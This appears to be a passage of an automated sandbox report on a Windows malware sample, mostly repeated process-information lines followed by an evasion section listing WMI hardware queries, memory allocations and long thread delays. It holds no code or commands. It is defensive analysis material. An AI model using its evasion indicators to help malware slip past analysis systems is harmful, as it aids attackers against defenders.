                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 7F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 43F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 4B50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 5B50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 5C80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 6C80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 9F50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: AF50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: B3E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: C3E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: E80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: 2C30000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: 2B50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: 5260000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: 6260000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: 6390000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: 7390000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: A050000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: B050000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: B4E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: 14A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: 3280000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory allocated: 2FC0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5422Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5754Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWindow / User API: threadDelayed 2557Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWindow / User API: threadDelayed 3970Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWindow / User API: threadDelayed 1147
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWindow / User API: threadDelayed 6891
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exe TID: 6368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep count: 5422 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep time: -922337203685477s >= -30000sJump to behavior
